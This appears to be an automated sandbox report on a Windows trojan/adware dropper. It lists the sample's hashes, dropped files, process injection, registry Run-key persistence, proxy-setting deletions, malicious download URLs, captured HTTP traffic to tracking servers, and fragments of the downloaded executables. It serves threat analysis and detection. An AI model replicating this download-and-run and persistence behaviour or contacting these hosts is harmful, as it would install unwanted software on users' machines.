Sample_ecbb675010
HEUR:Trojan.Win32.Generic (Kaspersky), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
| Requires JavaScript enabled! |
|---|
MD5: ecbb675010c552ac9a760c6171fe333a
SHA1: c410e9fee4937304671eeadae0c45fd11e6560b7
SHA256: 653b022cb1ec73fa0a263cce94d21a1234c0dd8f00c426d455af699177e0bb84
SSDeep: 3072:qFm5w9DzqOnOwK3X/cTgbYdqjjktasBzUamXXPoEKfP rD17:ymozpwX/Sgb0Btas1UhXPolaZ
Size: 250880 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-08-24 09:08:00
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
SecondL.exe:2700
Sho9libi.exe:600
OneTwo.exe:1712
%original file name%.exe:2948
The Trojan injects its code into the following process(es):
ik41xztlhxf.exe:2968
XF7UXTX5V.exe:2816
%original file name%.exe:1900
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process SecondL.exe:2700 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe (204 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe.config (1 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (856 bytes)
The process Sho9libi.exe:600 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (860 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (860 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (860 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.600.431124 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.600.431124 (0 bytes)
The process OneTwo.exe:1712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XF7UXTX5V5\uninstaller.exe (24113 bytes)
%Program Files%\XF7UXTX5V5\XF7UXTX5V.exe.config (1 bytes)
%Program Files%\XF7UXTX5V5\uninstaller.exe.config (1 bytes)
%Program Files%\XF7UXTX5V5\XF7UXTX5V.exe (118363 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (852 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (852 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (852 bytes)
The Trojan deletes the following file(s):
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.1712.428565 (0 bytes)
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.1712.428565 (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.1712.428581 (0 bytes)
The process XF7UXTX5V.exe:2816 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Program Files%\XF7UXTX5V5\cast.config (36 bytes)
The process %original file name%.exe:1900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\config.conf (47 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\Sho9libi.exe (240319 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\OneTwo.exe (20577 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\Sho9libi.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\OneTwo.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\SecondL.exe (208 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\SecondL.exe.config (1 bytes)
Registry activity
The process SecondL.exe:2700 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableConsoleTracing" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASAPI32]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\SecondL_RASMANCS]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process ik41xztlhxf.exe:2968 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\DDECache\IExplore\WWW_OpenURL]
"WindowClassName" = "DDEMLMom"
"processname" = "iexplore.exe"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"qqgism1kmmv" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe"
The process Sho9libi.exe:600 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"MaxFileSize" = "1048576"
"EnableFileTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASAPI32]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\Sho9libi_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
The process OneTwo.exe:1712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"EnableConsoleTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASMANCS]
"FileTracingMask" = "4294901760"
"ConsoleTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\OneTwo_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process XF7UXTX5V.exe:2816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASAPI32]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASAPI32]
"FileDirectory" = "%windir%\tracing"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\XF7UXTX5V_RASMANCS]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"V3D5001I9V3R52K" = "%Program Files%\XF7UXTX5V5\XF7UXTX5V.exe"
The process %original file name%.exe:1900 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASMANCS]
"FileTracingMask" = "4294901760"
"FileDirectory" = "%windir%\tracing"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASMANCS]
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\ecbb675010c552ac9a760c6171fe333a_RASAPI32]
"FileDirectory" = "%windir%\tracing"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_YV6PJ" = "C:\%original file name%.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:2948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
Dropped PE files
| MD5 | File path |
|---|---|
| d2738a329feb4a8fc491f7329f3cce54 | c:\Program Files\XF7UXTX5V5\XF7UXTX5V.exe |
| 142ddc1564c26937aabbdacff6201c37 | c:\Program Files\XF7UXTX5V5\uninstaller.exe |
| b710f363cefe8f229b926287cd182713 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\OneTwo.exe |
| f9b3e3b6df9d735c87d97f163640526a | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\SecondL.exe |
| 42ab9169f3024ae488e53bd869e7c55b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\ZXF46STGYK\Sho9libi.exe |
| e0638234fb697f2c4ff961fee8f702f6 | c:\Users\"%CurrentUserName%"\AppData\Roaming\0d3lro043kz\ik41xztlhxf.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: N26N
Product Name: N26N93C%M
Product Version: 1.1.5.1
Legal Copyright: Copyright (c) 8461
Legal Trademarks:
Original Filename: JijiLaPute.exe
Internal Name: JijiLaPute.exe
File Version: 1.1.5.1
File Description: N26N
Comments: N26N93C%
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 47108 | 47616 | 4.28806 | 1a919309987d84bac92bb89c582d6139 |
| .rsrc | 57344 | 201936 | 202240 | 3.67986 | 1739949e20a3553a237b867d57efa8e0 |
| .reloc | 262144 | 12 | 512 | 0.042395 | 6192891b82d91a777dbf5e9b1b3ce60e |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://thegrandemanager.com/remotes_xml_sections.php | |
| hxxp://bratitlamio.com/from_backup/747474/AdsShow_installer.exe | |
| hxxp://bratitlamio.com/3/000000/wizzcaster_installer_v2.exe | |
| hxxp://bratitlamio.com/exe/updater.exe | |
| hxxp://bratitlamio.com/safe_download/582369/AdsShow.exe | |
| hxxp://bratitlamio.com/download/3/wizzcaster_v2.exe | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok | |
| hxxp://bratitlamio.com/download/3/wizzcaster_uninstaller_v2.exe | |
| hxxp://agent.wizztrakys.com/api/v5/config | |
| hxxp://agent.wizztrakys.com/api/v5/link | |
| hxxp://ladomainadeserver.com/api/v5/config | |
| hxxp://ladomainadeserver.com/api/v5/link |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:28 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=bf662a4b0c8a256e7f3e5b93af6c02b0b4554926; expires=Fri, 01-Sep-2017 12:23:28 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"time_between_prints":"15"}HTTP/1.1 200 OK..Date: Fri, 01 Sep 2017 10
:23:28 GMT..Server: Apache/2.4.10 (Debian)..Cache-Control: no-cache..S
et-Cookie: laravel_session=bf662a4b0c8a256e7f3e5b93af6c02b0b4554926; e
xpires=Fri, 01-Sep-2017 12:23:28 GMT; Max-Age=7200; path=/; httponly..
Content-Length: 28..Keep-Alive: timeout=10, max=100..Connection: Keep-
Alive..Content-Type: text/html; charset=UTF-8..{"time_between_prints":
"15"}....
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: ladomainadeserver.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
....
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:28 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=ba2ecb2aeaeb153a66845af4501bc7780be001dc; expires=Fri, 01-Sep-2017 12:23:28 GMT; Max-Age=7200; path=/; httponly
Content-Length: 66
Content-Type: text/html; charset=UTF-8{"link":"http:\/\/ladomainadeserver.com\/redirect\/57a764d042bf8"}HTTP
/1.1 200 OK..Date: Fri, 01 Sep 2017 10:23:28 GMT..Server: Apache/2.4.1
0 (Debian)..Cache-Control: no-cache..Set-Cookie: laravel_session=ba2ec
b2aeaeb153a66845af4501bc7780be001dc; expires=Fri, 01-Sep-2017 12:23:28
GMT; Max-Age=7200; path=/; httponly..Content-Length: 66..Content-Type
: text/html; charset=..
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:26 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=g9v6mvsnre3l5r6rfrq6tpmns7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}....
POST /wemonetize/wizzmonetize/sales_we_DefaultProduct_DefaultPartner_1_notok HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
HTTP/1.1 100 Continue
....
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:26 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=fihsakh76hi7613aav8pa778i1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Content-Type: text/html; charset=UTF-8{"message":"Track was added"}..
GET /safe_download/582369/AdsShow.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload2000..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
.....Y.........."...0.............F2... ...@....@.. ..................
..................@..................................1..O....@..<..
..................`.......0...........................................
.... ............... ..H............text...L.... .....................
. ..`.rsrc...<....@......................@..@.reloc.......`........
..............@..B................(2......H.......("...............0..
.............................................0............s...........
.,N.~....r...p.o......(....r]..pra..po....rc..p(....o....rc..p(....o..
....o...... Z.rg..p(.............,...........,.. `......o....Z(......r
q..p(....&. `.......o....Z(......... .&....*...................0..4...
.....r...p..rg..p( .....,...r...p(!...("........ ... ..*".(#....*&.(#.
....*..0..9........~.........,".r...p.....($...o%...s&...........~....
. ..*....0...........~..... ..*".......*.0...........~..... ..*".('...
.*Vs....((...t.........*..BSJB............v2.0.50727......l...$...#~..
....t...#Strings........@...#US.D.......#GUID...T.......#Blob.........
..W..........3........$...................(...........................
....................J.F.....F...~.................-.................j.
..................'...<.'...........K.....K...R.K...2.......K...J..
...a.....!.F.....f...........&.....&.....w...\.....!.......K...S.....9
.............K...e.K.....w...................<...=.............<<< skipped >>>
GET /download/3/wizzcaster_v2.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:26 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload127e00..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L...p$.Y.........."...0.............r.... ........@.. ................
....................@................................. ...O...........
......................................................................
... ............... ..H............text...x.... ......................
..`.rsrc...............................@..@.reloc...............|....
..........@..B................T.......H........!.............../.. ...
.........................................0..........(....(.....~....(.
....~....(.....(......o........io.....(.....o....(....(........o....r.
..po.......o....t#..........%...o....&..&..*.................0..3.....
..(....~....o......s....%o .....o!...o".......&.....*.........,,......
.0..........s#......&.....*.................~r...p.....rY..p.....rs..p
.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*.....
..*.~....*..((...*Vs....()...t.........*BSJB............v2.0.50727....
..l...\...#~..........#Strings............#US.l.......#GUID...|...X...
#Blob...........W..........3........(...................).............
......................................4...........h...................
................T.....m.................&...........@.P.....P.........
..P...A...........4.H...K...........8.................|...........S.P.
..W.....j.......[.....P.................................f.P...........
..............H.V.=...........#.=.........7.#.q...................<<< skipped >>>
GET /download/3/wizzcaster_uninstaller_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:27 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_uninstaller_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload77800..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...q$.Y.........."...0.............R.... ........@.. .................
...................@.....................................O.......<.
......................................................................
..... ............... ..H............text...X.... ....................
.. ..`.rsrc...<...........................@..@.reloc...............
v..............@..B................4.......H........!.............../.
..............................................0..........(....(.....~.
...(.....~....(.....(......o........io.....(.....o....(....(........o.
...r...po.......o....t#..........%...o....&..&..*.................0..3
.......(....~....o......s....%o .....o!...o".......&.....*.........,,.
......0..........s#......&.....*.................~r...p.....rY..p.....
rs..p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*
.......*.~....*..((...*Vs....()...t.........*BSJB............v2.0.5072
7......l...\...#~..........#Strings............#US.l.......#GUID...|..
.X...#Blob...........W..........3........(...................)........
...........................................4...........h..............
.....................T.....m.................&...........@.P.....P....
.......P...A...........4.H...K...........8.................|..........
.S.P...W.....j.......[.....P.................................f.P......
...................H.V.=...........#.=.........7.#.q..............<<< skipped >>>
GET /from_backup/747474/AdsShow_installer.exe HTTP/1.1
Host: bratitlamio.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:23 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload2a00..MZ......................@.......................................
........!..L.!This program cannot be run in DOS mode....$.......PE..L.
..C..Y.........."...0.............N=... ...@....@.. ..................
..................@..................................<..O....@..T..
..................`.......;...........................................
.... ............... ..H............text...T.... .....................
. ..`.rsrc...T....@....... ..............@..@.reloc.......`.......(...
...........@..B................0=......H........#..D............;.....
..........................................0..%.............(....(....r
...pr...po....(......(....&.(....r...pr...po....r...p(....(........ T.
.... ..........,........ #.....3..... ......,......X......X.... X.....
....-.....X.... ..........-.... ...... ..........,.........X.... .....
.....-..(.....(...........%.r...p.%.ra..p.%.r...p.%.r...p.%.rG..p.%.r[
..p.%.rB..p.%.rR..p.%.r...p.%..r...p.%..rQ..p.%..r...p.%..r...p.%..r:.
.p.%..r...p.%..r...p.%..r...p.%..r9..p.%..rQ..p.%..r...p.%..r...p.%..r
...p.%..r...p.%..r...p.%..r...p.%..r...p.(.......r...p(......(........
......,.....(....& ..r...p(....&.........*...A........................
....0..f........r...p.r!..p... ".. ..........,...r7..p(.........X.. ..
........-.s.......rG..p(....s.....o.....r...p.*".( ....*&.( .....*....
0..9........~.........,".r...p.....(!...o"...s#...........~..... ..*..
..0...........~..... ..*".......*.0...........~..... ..*".($....*Vs...
.(%...t.........*..BSJB............v2.0.50727......l...$...#~.....<<< skipped >>>
GET /3/000000/wizzcaster_installer_v2.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:23 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_installer_v2.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload32c00..MZ......................@......................................
.........!..L.!This program cannot be run in DOS mode....$.......PE..L
...p$.Y.........."...0..v............... ........@.. .................
...................@.................................X...O.......<.
...................`...... ...........................................
..... ............... ..H............text....u... ...v................
.. ..`.rsrc...<............x..............@..@.reloc.......`.......
*..............@..B........................H........!.............../.
.Xd...........................................0..........(....(.....~.
...(.....~....(.....(......o........io.....(.....o....(....(........o.
...r...po.......o....t#..........%...o....&..&..*.................0..3
.......(....~....o......s....%o .....o!...o".......&.....*.........,,.
......0..........s#......&.....*.................~r...p.....rY..p.....
rs..p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....*
.......*.~....*..((...*Vs....()...t.........*BSJB............v2.0.5072
7......l...\...#~..........#Strings............#US.l.......#GUID...|..
.X...#Blob...........W..........3........(...................)........
...........................................4...........h..............
.....................T.....m.................&...........@.P.....P....
.......P...A...........4.H...K...........8.................|..........
.S.P...W.....j.......[.....P.................................f.P......
...................H.V.=...........#.=.........7.#.q..............<<< skipped >>>
GET /exe/updater.exe HTTP/1.1
Host: bratitlamio.com
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:23 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload23b800..MZ......................@.....................................
..........!..L.!This program cannot be run in DOS mode....$.......PE..
L....$.Y.........."...0...!.........R !.. ...@!...@.. ................
....... $...........@.................................. !.O....@!.<
.....................$.......!........................................
...... ............... ..H............text...X.!.. ....!..............
... ..`.rsrc...<....@!.......!.............@..@.reloc........$.....
..#.............@..B................4 !.....H........!.............../
.... ..........................................0..........(....(.....~
....(.....~....(.....(......o........io.....(.....o....(....(........o
....r...po.......o....t#..........%...o....&..&..*.................0..
3.......(....~....o......s....%o .....o!...o".......&.....*.........,,
.......0..........s#......&.....*.................~r...p.....rY..p....
.rs..p.....*..($...*.~....-.r...p.....(%...o&...s'........~....*.~....
*.......*.~....*..((...*Vs....()...t.........*BSJB............v2.0.507
27......l...\...#~..........#Strings............#US.l.......#GUID...|.
..X...#Blob...........W..........3........(...................).......
............................................4...........h.............
......................T.....m.................&...........@.P.....P...
........P...A...........4.H...K...........8.................|.........
..S.P...W.....j.......[.....P.................................f.P.....
....................H.V.=...........#.=.........7.#.q.............<<< skipped >>>
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: thegrandemanager.com
Content-Length: 169
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
....
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47
a47968c&buying_product_name=DefaultProduct&buying_partner_name=Default
Partner&buying_channel_name=1
HTTP/1.1 200 OK
Date: Fri, 01 Sep 2017 10:23:20 GMT
Server: Apache
Set-Cookie: PHPSESSID=l9e9opd6os7hn2u2u8719v4k55; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 1608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
